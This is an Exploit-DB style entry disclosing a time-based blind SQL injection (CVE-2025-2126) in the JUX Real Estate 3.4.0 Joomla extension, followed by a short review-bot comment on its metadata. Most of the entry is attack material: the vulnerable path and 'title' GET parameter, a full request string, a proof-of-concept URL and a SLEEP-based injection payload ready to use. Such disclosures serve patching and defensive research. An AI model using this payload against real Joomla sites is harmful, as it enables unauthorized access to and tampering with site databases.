
3 changes to exploits/shellcodes/ghdb FluxBB 1.5.11 - Stored Cross-Site Scripting (XSS) JUX Real Estate 3.4.0 - SQL Injection
44 lines
No EOL
1.4 KiB
Text
# Exploit Title: JUX Real Estate 3.4.0 - SQL Injection
# Exploit Author: CraCkEr
# Date: 26/02/2025
# Vendor: JoomlaUX
# Vendor Homepage: https://joomlaux.com/
# Software Link: https://extensions.joomla.org/extension/jux-real-estate/
# Demo Link: http://demo.joomlaux.com/#jux-real-estate
# Tested on: Windows 11 Pro
# Impact: Database Access
# CWE: CWE-89 - CWE-74 - CWE-707
# CVE: CVE-2025-2126
# VDB: VDB-299039

## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.

Path: /extensions/realestate/index.php/properties/list/list-with-sidebar/realties

GET Parameter 'title' is vulnerable to SQLi

---
Parameter: title (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: option=com_jux_real_estate&view=realties&Itemid=148&title='XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search

## POC:

https://website/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=[SQLi]

## Payload:

1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z

[-] Done
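Review bot: In the header block, the affected release appears only inside the `# Exploit Title` string and `# Tested on: Windows 11 Pro` names just an operating system, so a reader cannot scope exposure or tell what server stack the finding was confirmed on. Add a dedicated version line, record the Joomla and database versions tested (the scan output states only `MySQL >= 5.0.12`), and say whether a fixed release of the extension exists. The `## Description` paragraph is generic SQL injection text; one sentence tying it to the `title` parameter of `com_jux_real_estate` would make the entry self-explanatory. The file also ends at `[-] Done` without a trailing newline.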